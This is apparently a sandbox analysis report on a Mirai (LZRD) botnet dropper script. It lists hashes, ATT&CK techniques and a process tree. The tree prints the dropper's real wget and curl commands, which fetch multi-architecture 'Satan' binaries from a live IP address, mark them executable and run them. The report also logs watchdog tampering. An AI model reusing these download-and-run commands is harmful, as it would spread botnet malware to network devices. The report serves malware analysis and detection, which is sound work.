mirai | 9728623b44f5e32acfd770915d4d1b244997a757b4bdf01e5259bcdf9918784b

Analysis

max time kernel
136s
max time network
152s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
20-11-2024 22:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

2KB
MD5

f9c8b9116a6544ef8d58828792753e7c
SHA1

5c6d5022d286ea418696cb67741df180e5cfc9b4
SHA256

9728623b44f5e32acfd770915d4d1b244997a757b4bdf01e5259bcdf9918784b
SHA512

e4c10931ad880f64cd284648287324beb72b76adfbfc55e90abac1c868c00d4209be1b98c3c50fd7c9b1a572a67feefadf74f5c817126a922001ce1f44e7f43e

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid process

722 chmod
729 chmod
887 chmod
852 chmod
858 chmod
864 chmod
876 chmod
881 chmod
754 chmod
795 chmod
846 chmod
870 chmod
784 chmod
809 chmod
840 chmod

pid	process
722	chmod
729	chmod
887	chmod
852	chmod
858	chmod
864	chmod
876	chmod
881	chmod
754	chmod
795	chmod
846	chmod
870	chmod
784	chmod
809	chmod
840	chmod

Executes dropped EXE 15 IoCs

Processes:

SatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatanSatan

ioc	pid	process
/tmp/Satan	723	Satan
/tmp/Satan	730	Satan
/tmp/Satan	756	Satan
/tmp/Satan	785	Satan
/tmp/Satan	796	Satan
/tmp/Satan	810	Satan
/tmp/Satan	841	Satan
/tmp/Satan	847	Satan
/tmp/Satan	853	Satan
/tmp/Satan	859	Satan
/tmp/Satan	865	Satan
/tmp/Satan	871	Satan
/tmp/Satan	877	Satan
/tmp/Satan	882	Satan
/tmp/Satan	888	Satan

Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
defense_evasion

Impair Defenses
T1562

Processes:

Satan

description ioc process

File opened for modification /dev/watchdog Satan
File opened for modification /dev/misc/watchdog Satan
Enumerates running processes
Discovers information about currently running processes on the system
Writes file to system bin folder 2 IoCs

Processes:

Satan

description ioc process

File opened for modification /sbin/watchdog Satan
File opened for modification /bin/watchdog Satan

description	ioc	process
File opened for modification	/dev/watchdog	Satan
File opened for modification	/dev/misc/watchdog	Satan

description	ioc	process
File opened for modification	/sbin/watchdog	Satan
File opened for modification	/bin/watchdog	Satan

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
/tmp/Satan	upx
/tmp/Satan	upx
/tmp/Satan	upx
/tmp/Satan	upx

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

Satancurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/114/status	Satan
File opened for reading	/proc/321/status	Satan
File opened for reading	/proc/13/status	Satan
File opened for reading	/proc/14/status	Satan
File opened for reading	/proc/83/status	Satan
File opened for reading	/proc/147/status	Satan
File opened for reading	/proc/694/status	Satan
File opened for reading	/proc/7/status	Satan
File opened for reading	/proc/78/status	Satan
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/10/status	Satan
File opened for reading	/proc/664/status	Satan
File opened for reading	/proc/689/status	Satan
File opened for reading	/proc/12/status	Satan
File opened for reading	/proc/383/status	Satan
File opened for reading	/proc/16/status	Satan
File opened for reading	/proc/69/status	Satan
File opened for reading	/proc/138/status	Satan
File opened for reading	/proc/663/status	Satan
File opened for reading	/proc/665/status	Satan
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/3/status	Satan
File opened for reading	/proc/24/status	Satan
File opened for reading	/proc/72/status	Satan
File opened for reading	/proc/374/status	Satan
File opened for reading	/proc/691/status	Satan
File opened for reading	/proc/6/status	Satan
File opened for reading	/proc/8/status	Satan
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/9/status	Satan
File opened for reading	/proc/372/status	Satan
File opened for reading	/proc/20/status	Satan
File opened for reading	/proc/71/status	Satan
File opened for reading	/proc/659/status	Satan
File opened for reading	/proc/799/status	Satan
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/1/status	Satan
File opened for reading	/proc/19/status	Satan
File opened for reading	/proc/76/status	Satan
File opened for reading	/proc/319/status	Satan
File opened for reading	/proc/790/status	Satan
File opened for reading	/proc/796/status	Satan
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/5/status	Satan
File opened for reading	/proc/74/status	Satan
File opened for reading	/proc/21/status	Satan
File opened for reading	/proc/22/status	Satan
File opened for reading	/proc/73/status	Satan
File opened for reading	/proc/115/status	Satan
File opened for reading	/proc/325/status	Satan
File opened for reading	/proc/690/status	Satan
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/18/status	Satan
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/81/status	Satan
File opened for reading	/proc/105/status	Satan
File opened for reading	/proc/356/status	Satan
File opened for reading	/proc/400/status	Satan
File opened for reading	/proc/773/status	Satan
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/4/status	Satan
File opened for reading	/proc/77/status	Satan

System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

curlcatwgetcurlcatwget

pid process

793 curl
794 cat
802 wget
803 curl
808 cat
788 wget

pid	process
793	curl
794	cat
802	wget
803	curl
808	cat
788	wget

Writes file to tmp directory 30 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlwgetwgetcurlcurlwgetcurlwgetcurlwgetcurlwgetcurlwgetcurlcpcurlwgetcurlwgetwgetwgetcurlcurlcurlohshit.shwgetwgetcurlcurl

description	ioc	process
File opened for modification	/tmp/Satan.mips64	curl
File opened for modification	/tmp/Satan.arm5	wget
File opened for modification	/tmp/Satan.mips	wget
File opened for modification	/tmp/Satan.x86_64	curl
File opened for modification	/tmp/Satan.mpsl	curl
File opened for modification	/tmp/Satan.arm6	wget
File opened for modification	/tmp/Satan.ppc	curl
File opened for modification	/tmp/Satan.m68k	wget
File opened for modification	/tmp/Satan.x86	curl
File opened for modification	/tmp/Satan.x86_64	wget
File opened for modification	/tmp/Satan.arm6	curl
File opened for modification	/tmp/Satan.arc	wget
File opened for modification	/tmp/Satan.i686	curl
File opened for modification	/tmp/Satan.mpsl	wget
File opened for modification	/tmp/Satan.sparc	curl
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/Satan.arm7	curl
File opened for modification	/tmp/Satan.ppc	wget
File opened for modification	/tmp/Satan.mips	curl
File opened for modification	/tmp/Satan.x86	wget
File opened for modification	/tmp/Satan.i686	wget
File opened for modification	/tmp/Satan.arm	wget
File opened for modification	/tmp/Satan.arm	curl
File opened for modification	/tmp/Satan.arm5	curl
File opened for modification	/tmp/Satan.m68k	curl
File opened for modification	/tmp/Satan	ohshit.sh
File opened for modification	/tmp/Satan.arm7	wget
File opened for modification	/tmp/Satan.sh4	wget
File opened for modification	/tmp/Satan.sh4	curl
File opened for modification	/tmp/Satan.arc	curl

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Writes file to tmp directory
PID:692
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Writes file to tmp directory
  PID:695
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.arc
  2⤵
  - Writes file to tmp directory
  PID:700
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.arc
  2⤵
  - Writes file to tmp directory
  PID:712
- /bin/cat
  cat Satan.arc
  2⤵
  PID:721
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-XDHzUI
  2⤵
  - File and Directory Permissions Modification
  PID:722
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:723
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.x86
  2⤵
  - Writes file to tmp directory
  PID:725
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:727
- /bin/cat
  cat Satan.x86
  2⤵
  PID:728
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.x86 systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-XDHzUI
  2⤵
  - File and Directory Permissions Modification
  PID:729
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:730
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.x86_64
  2⤵
  - Writes file to tmp directory
  PID:732
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.x86_64
  2⤵
  - Writes file to tmp directory
  PID:742
- /bin/cat
  cat Satan.x86_64
  2⤵
  PID:750
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.x86 Satan.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:754
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:756
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.i686
  2⤵
  - Writes file to tmp directory
  PID:759
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.i686
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:771
- /bin/cat
  cat Satan.i686
  2⤵
  PID:783
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.i686 Satan.x86 Satan.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:784
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:785
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:788
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:793
- /bin/cat
  cat Satan.mips
  2⤵
  - System Network Configuration Discovery
  PID:794
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.i686 Satan.mips Satan.x86 Satan.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:795
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:796
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.mips64
  2⤵
  - System Network Configuration Discovery
  PID:802
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.mips64
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:803
- /bin/cat
  cat Satan.mips64
  2⤵
  - System Network Configuration Discovery
  PID:808
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.i686 Satan.mips Satan.mips64 Satan.x86 Satan.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:809
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:810
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.mpsl
  2⤵
  - Writes file to tmp directory
  PID:813
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:820
- /bin/cat
  cat Satan.mpsl
  2⤵
  PID:839
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.i686 Satan.mips Satan.mips64 Satan.mpsl Satan.x86 Satan.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:840
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:841
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.arm
  2⤵
  - Writes file to tmp directory
  PID:843
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.arm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:844
- /bin/cat
  cat Satan.arm
  2⤵
  PID:845
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.arm Satan.i686 Satan.mips Satan.mips64 Satan.mpsl Satan.x86 Satan.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:846
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:847
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.arm5
  2⤵
  - Writes file to tmp directory
  PID:849
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.arm5
  2⤵
  - Writes file to tmp directory
  PID:850
- /bin/cat
  cat Satan.arm5
  2⤵
  PID:851
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.arm Satan.arm5 Satan.i686 Satan.mips Satan.mips64 Satan.mpsl Satan.x86 Satan.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:852
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:853
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.arm6
  2⤵
  - Writes file to tmp directory
  PID:855
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.arm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:856
- /bin/cat
  cat Satan.arm6
  2⤵
  PID:857
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.arm Satan.arm5 Satan.arm6 Satan.i686 Satan.mips Satan.mips64 Satan.mpsl Satan.x86 Satan.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:858
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:859
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.arm7
  2⤵
  - Writes file to tmp directory
  PID:861
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.arm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:862
- /bin/cat
  cat Satan.arm7
  2⤵
  PID:863
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.arm Satan.arm5 Satan.arm6 Satan.arm7 Satan.i686 Satan.mips Satan.mips64 Satan.mpsl Satan.x86 Satan.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:864
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:865
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.ppc
  2⤵
  - Writes file to tmp directory
  PID:867
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.ppc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:868
- /bin/cat
  cat Satan.ppc
  2⤵
  PID:869
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.arm Satan.arm5 Satan.arm6 Satan.arm7 Satan.i686 Satan.mips Satan.mips64 Satan.mpsl Satan.ppc Satan.x86 Satan.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:870
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:871
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.sparc
  2⤵
  PID:873
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.sparc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:874
- /bin/cat
  cat Satan.sparc
  2⤵
  PID:875
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.arm Satan.arm5 Satan.arm6 Satan.arm7 Satan.i686 Satan.mips Satan.mips64 Satan.mpsl Satan.ppc Satan.sparc Satan.x86 Satan.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:876
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:877
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.m68k
  2⤵
  - Writes file to tmp directory
  PID:878
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.m68k
  2⤵
  - Writes file to tmp directory
  PID:879
- /bin/cat
  cat Satan.m68k
  2⤵
  PID:880
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.arm Satan.arm5 Satan.arm6 Satan.arm7 Satan.i686 Satan.m68k Satan.mips Satan.mips64 Satan.mpsl Satan.ppc Satan.sparc Satan.x86 Satan.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:881
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:882
- /usr/bin/wget
  wget http://193.84.71.119/nice/Satan.sh4
  2⤵
  - Writes file to tmp directory
  PID:884
- /usr/bin/curl
  curl -O http://193.84.71.119/nice/Satan.sh4
  2⤵
  - Writes file to tmp directory
  PID:885
- /bin/cat
  cat Satan.sh4
  2⤵
  PID:886
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.arm Satan.arm5 Satan.arm6 Satan.arm7 Satan.i686 Satan.m68k Satan.mips Satan.mips64 Satan.mpsl Satan.ppc Satan.sh4 Satan.sparc Satan.x86 Satan.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:887
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:888

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Satan

Filesize
37KB

MD5
edf612986dba9abff11a7530fa06d3c2

SHA1
c39e5ecf48ed660df4c93353744955bebfb91636

SHA256
d7800781555066e97a3165a99ca416c452f0d60d9160fdcc62e842311c8664f0

SHA512
0dd292e9760c9ac15b06809133d8296f21250085c803585be73abcd1d1faacbf07bb28a0703943f65c0bc66e0c6311b3342a1c39e118dfae6491b5f7b7eeda9f

Download Submit
/tmp/Satan

Filesize
36KB

MD5
e4df8be7344cd39e0a8e908adbe23cd4

SHA1
0a3fa93b2ef3b28f3bdbd9b5b7774d85205d6d86

SHA256
c765671d83adf38b777ecf372154f3b6cb163a429ab97256b91bb17f7600fcc8

SHA512
c76d538d2a6a5ffbde826f2f6265bbd2580d3843bc72c7064b106ddb5e181e3cb57b60578bf0ec9b24c45aee42d94dbd9ed3145d5035439090c743ec0388691d

Download Submit
/tmp/Satan

Filesize
37KB

MD5
41e05e860b010e5fcd45b4d31066a4d5

SHA1
c9323c177e80e8ca771b71a8870c56cd57d120b9

SHA256
b0620d51cbff58f2554d63d5b4ba4876ca09ce6b6e573e8f6617fa62d32444b7

SHA512
5063587d8cab6d5c292b408f6936c227ad2b9c7ccaaf7ce01d215f63ba800ce0186fd7903e761cb2ef25cc82e0471d452f4941381fa86819fa2980160f214878

Download Submit
/tmp/Satan

Filesize
43KB

MD5
0f9243f3bb330ae152066d721cae99c9

SHA1
7757b9813ca2ae175aa4be68a194b059159688e3

SHA256
5d98715cda4a5de8bea0830b8b7dc2823820b1e374b783e314c2ee8c539b262b

SHA512
3e858e572abc6d2d0dd79da888f470fcb334e3a200e18e0b766056662890b0f0371185f82f9b89c2a505db905ad7d836d0353c54f8e3aef8028ffcf5cb7c20f1

Download Submit
/tmp/Satan

Filesize
95KB

MD5
e855606f81d646856b3857b261cb2be2

SHA1
121870729f8a383619bcb14fd6c866dbfd7db5ea

SHA256
1bd89bdcd34e8f2d98d96c2492560fd584f359e266377486ec18295b16d7617d

SHA512
1713bacb79648b18bd57b082aa2001cec6edaa6e8b5ccf7d20a04bba5b15ed80f1f3a45c9a0c240263dd90e3781f9cad5c1a41738d6306c2ca46a923e53a1b5e

Download Submit
/tmp/Satan.arc

Filesize
113KB

MD5
9de12c22a69d095a6338587f24e647d6

SHA1
ebfed805c282dad0b14dff439244389eba88e1f3

SHA256
74843b368ce9364f2e19a07dcd1f51e7a066da82dfdbddd71a0329fd1b13850a

SHA512
bcc5ea5ab6596a9dc8cf5a68c43e33b5a1535eef962a46f0a61ecdc78b8df42b1eac717d7e2fb398b8b88150499057c4cedbda1d3c2de664d5523f117e834c1f

Download Submit
/tmp/busybox

Filesize
857KB

MD5
a39fe8036e559ce804e26518061e59ff

SHA1
8df27f6e8a48b762d945ea2f2b87390c80acd4de

SHA256
3180df117342646dcdc4c436f95b41e15587e2238ec59064b4b06c065d56cf38

SHA512
e97756f316fceef7360e789362648529eea50eb6f7cc56cf654b3fc43ca61f0e4d9f366ed8fd59b73dd5a49615e935e9f53686d15f9a83c7fa472a70e7196d0d

Download Submit
memory/796-1-0x00400000-0x0043cffc-memory.dmp

Download